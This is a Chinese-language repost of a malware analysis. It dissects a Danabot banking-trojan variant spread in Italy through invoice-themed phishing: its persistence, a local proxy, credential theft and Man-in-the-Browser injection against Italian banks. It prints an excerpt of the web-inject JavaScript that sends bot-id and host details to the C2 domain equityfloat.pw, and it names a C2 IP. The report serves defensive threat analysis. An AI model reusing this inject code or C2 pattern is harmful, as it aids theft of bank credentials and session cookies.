攻防最前线：Danabot木马新变种在意大利大规模传播

尽管 Proofpoint 和 Eset 等安全公司早在今年5月份就曾针对在澳大利亚传播的Danabot样本进行了全面的分析，但就在过去的几周里，一个新的Danabot变种再次袭击了意大利。在这篇文章中，Cybaze-Yoroi ZLab将对最近通过以“fattura（发票）”为主题的网络钓鱼电子邮件（例如， N051118 ）在意大利传播的Danabot变种之一进行剖析。值得注意的是，这个变种滥用了包含嵌入式宏的Word文档来下载恶意DLL paylaod。

技术分析

首先，这个新的Danabot变种会尝试通过加密的SSL通道连接到远程主机149.154.157.104（EDIS-IT IT），然后下载其他组件并从文件系统中删除自己。与此同时，它还会在“HKLM\SYSTEM\CurrentControlSet\Services”注册表项中设置了一个系统服务。以下注册表项被用于加载位于“C:\ProgramData\D93C2DAC”文件夹中的DLL，该文件夹被配置为“只读”和“隐藏”。

图1.恶意软件创建的注册表项

图2. D93C2DAC文件夹

这个隐藏文件夹包含两个处于执行中的组件：“D93C2D32.dll”和“D93C2D64.dll”。实际上，它们是两个完全相同的组件，区别在于一个是32位，一个是64位。显然，它们是针对不同体系机构的目标主机设计的，但都通过rundll32.exe进程执行。

也就是说，恶意DLL至少会被加载两次（一次加载D93C2D32.dll，一次加载D93C2D64.dll），且每次的参数都不同，具体取决于要导出的函数（针对不同体系机构的目标主机）：

图3.恶意DLL导出的函数

图4.恶意软件的执行示例

如图3所示，恶意DLL最终会导出8个关键函数：“f1”、“f2”、“f3”、“f4”、“f5”、“f6”、“f7”和“f8”。其中，“f1”被用于将恶意软件安装到目标主机中，而“f4”和“f5”则被用于实现持久性。具体来说，“f5”被用于在本地端口1080上设置一个系统转发代理。如此一来，目标主机与Internet之间的所有通信都将通过代理进行，使得恶意软件能够拦截和篡改网络流量。相对应的，“f4”被用于管理流量并执行Man-In-The-Browser攻击。如此一来，从目标主机到Internet的所有DNS呼叫都将被篡改，以与恶意软件中硬编码的银行网站列表相匹配。恶意软件会在原始页面中添加了一段javascript代码，以窃取用户名、密码和会话cookie等敏感信息。

图5.执行中的监听代理

在执行上述函数的过程中，恶意软件还会搜索存储在已安装Web浏览器（如Google Chrome和Mozilla Firefox）数据文件夹中的敏感信息，如保存的凭证。然后，它会将收集到的凭证存储在位于“C:\WINDOWS\TEMP”路径下的一个临时 SQLite 数据库中。

图6.带有被盗凭证的临时SQLite数据库

Man-In-The-Browser攻击

为了能够执行Man-In-The-Browser攻击，恶意软件设置了一个系统转发代理，如图7所示。通过这种方式，它能够检查所有传入和传出的internet流量。当受害者访问任意一个目标网站的特定网页时，恶意软件都会将一段自定义javascript代码注入该页面，以窃取敏感的用户信息，如个人详细信息、凭证和PAN码。如上所述，这个代理是由恶意DLL的“ f4 ”函数负责管理的。

图7.代理设置

图8.恶意软件的代码片段

通过对恶意软件样本源代码的分析，Cybaze-Yoroi ZLab得到了其目标网页的完整列表。从这份列表来看，该恶意软件针对的是各种金融机构的客户，且大多数都是意大利银行的客户，如Bancoposte、Intesa San Paolo、Banca Generali、BNL、Hello Bank、UBI Banca等。除了银行网站之外，恶意软件还针对了一些电子邮件服务提供商，如Tim、Yahoo、Hotmail、GMail等国际通用的电子邮件服务，以及与 Tecnocasa等意大利房地产公司相关的其他更具体的电子邮件服务。

图9.没有被注入脚本的银行网站

图10.被注入脚本的银行网站

Web-Inject

被注入网页的恶意javascript会将被盗信息发送给C2，包括受害者的会话cookie。如下代码片段是从“ http://equityfloat[.]pw/hc/myjs28frr_s51.js”下载的webinject代码。

图11.从equityfloat[.]pw C2下载的javascript

这段Webinject代码被用于检查恶意 php 资源“/my9rep/777.php”，以及将包括bot-id在内的受感染主机详细信息和当前会话cookie发送给C2。

var wwww = 'https://equityfloat.pw/';

wwww = "https://" + document.location.host + "/";

var waitdiv = "<center id=\"fkwt\" class=\"fkwt\"> <br/> Poczekaj aż Twój komputer zostanie zidentyfikowany. Może to potrwać trochę czasu... <br/><img src=\"" + wwww + "/my9rep/777.php?imgto=wait\"></img></center>";

var waitfk = "";

var waitlok = "<div><center> <br/> Prowadzone sa prace modernizacyjne w celu jak najszybszego przywrocenia dzialania systemu.<br/>Przyblizony czas modernizacji wynosi kilka godzin.<br/>Przepraszamy za tymczasowe utrudnienie i niedogodnosci.<br/><center></div>";

var netbot = "frr";

var rem777bname2 = "";

var tbid = my7ajx("#myjs1[data-botid]");

if (tbid.length > 0) rem777bname2 = tbid.attr("data-botid");

var loca = location.href;

var tyyp = true;

var apan = wwww + "/my9rep/777.php?typ=" + document.location.host + "&sub=" + netbot + "&b=2&inf=" + rem777bname2;

var args = {};

var tmp1;

var tkstate = 1;

var lg = "",

ps = "",

tk = "";

var lgf;

var pss;

var tabl;

var tabltr;

var btn;

var clickfnc;

var ansq = false;

需要指出的是，该恶意软件使用了一个自定义的JQuery脚本“var tbid=my7ajx(“#myjs1[data-botid]”);”来设置受感染主机的bot-id，而这个bot-id与C2 “equityfloat.]com”php页面的路径联系在一起。

var apan = wwww + "/my9rep/777.php?typ=" + document.location.host + "⊂=" + netbot + "&b=2&inf=" + rem777bname2;

通过这种方式，攻击者可以获知MitB代理是否注入成功。

总结

在过去的一年里，Danabot已经将其活动范围扩大到了意大利，尤其是在今年11月份（例如， N051118 ）期间，Cybaze-Yoroi ZLab就拦截了一波大规模的攻击浪潮。从恶意软件样本所针对的目标来看，网络犯罪分子对意大利用户和组织的兴趣正在日益增加，且不仅仅局限于传统的银行业。

声明：本文来自黑客视界，版权归作者所有。文章内容仅代表作者独立观点，不代表安全内参立场，转载目的在于传递更多信息。如需转载，请联系原作者获取授权。